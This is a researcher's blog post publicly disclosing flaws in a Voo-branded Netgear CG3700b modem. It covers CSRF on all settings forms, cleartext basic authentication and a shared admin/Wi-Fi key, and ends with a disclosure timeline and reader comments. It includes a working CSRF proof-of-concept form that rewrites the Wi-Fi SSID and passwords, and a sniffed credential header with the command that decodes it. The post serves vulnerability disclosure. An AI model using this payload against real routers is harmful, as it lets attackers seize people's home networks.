Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.
Voo branded Netgear CG3700b Vulnerabilities – Introduction
As the 90 days have passed since disclosing it to the vendor (see timeline below), it was time for me to publicly disclose my findings and payloads.
CVEs are still pending, but I will add them to this post when I receive them.
Cross-Site Request Forgery (CSRF) on all form POSTs
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration setting (/goform/
Before settings:
Example CSRF form:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index" <input type="hidden" name="group_parametrage_wifi" value="active"> <input type="hidden" name="reseau_wifi_name" value="NEWSSID"> <input type="hidden" name="nom_select" value="AUTO-PSK"> <input type="hidden" name="canal" value=0> <input type="hidden" name="mot_de_passe" value="NEWWPAKEY"> <input type="hidden" name="NBandwidth" value=20> <input type="hidden" name="group_parametrage_wifi_an" value="active"> <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G"> <input type="hidden" name="nom_select_an" value="AUTO-PSK"> <input type="hidden" name="canal_an" value=0> <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G"> <input type="hidden" name="NBandwidth_an" value=20> <input type="hidden" name="group_fon" value="desactiver"> <input type="hidden" name="buttonApply" value=1> <input type="hidden" name="only_mode" value=0> <input type="hidden" name="selected_ch_an" value=1> </form>
After CSRF:
Insufficient Authentication (OWASP-A2)
This same modem handles authentication via basic authentication over the default (HTTP, non-ssl) connection. This allows an attacker to easily decode the base64 encoded username and password, and authenticate to the router. This only requires an attacker be on the same network as the router, and sniff the clear-text traffic.
Example:
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE
Screenshot:
[email protected]:~# cat voo.txt dm9vOlBBU1NXT1JE [email protected]:~# base64 --decode voo.txt voo:PASSWORD
Insufficient Authentication (OWASP-A2)
The Voo Netgear CG3700b also uses the same key for authentication to the administrative console as well as to the wireless by default.
If a WPA2 flaw were to be found that made cracking it simple, the HTTP basic authentication was brute forced (known charset of A-Z and 8 characters), or some other vulnerability found, then this would cause both systems to fail instead of just one.
Disclosure Timeline
- 2016-01-22 – Discovered vulnerability, initially notified vendor.
- 2016-01-23 – Requested CVE.
- 2016-03-07 – Contacted vendor again, they notified me that they will not fix these issues at this time.
- 2016-04-20 – Attempted to contact Mitre again to receive CVE.
- 2016-04-21 – Sent to Full Disclosure.
- 2016-04-23 – Additional information and full disclosure published here.
- 2016-04-26 – Resent to Full Disclosure due to some errors.
- 2019-06-20 – Requested CVEs again with the new form.
Voo branded Netgear CG3700b Vulnerabilities – Conclusion
All in all, a fun weekend, and a few good findings.
The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.
I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.
Hello,
I read “2019-06-20 – Requested CVEs again with the new form.”
Do you know if the vulnerabilities are still present in V2.03.03? It has been deployed approximately in 2017 by VOO (i.e. about one year after your report about 2.02.x). See e.g. https://forum.voo.be/ma-connexion-internet-17/interface-du-modem-netgear-bug-7852#post69290
I have access to one such upgraded device if you like. (I mean you may or not still live in Belgium.)
Thank you for your investigation and blog post
Regards
O.
I’m actually not sure, as I moved away from Belgium!
That said, it should be easy enough to see if they still exist, based on this post alone.
If you have any questions or information, then please let me know.
Pingback: Vulnerability Summary for the Week of March 9, 2020 ~ Agenparl
Pingback: Vulnerability Summary for the Week of March 16, 2020 | DefendEdge
Pingback: Vulnerability Summary for the Week of March 9, 2020 – Federal Feed
Pingback: Vulnerability Summary for the Week of March 16, 2020 – Taurus Technology
Pingback: Vulnerability Summary for the Week of March 9, 2020 – Taurus Technology
Pingback: Hacking Blog Aspirations - My Progress Through the Years | doyler.net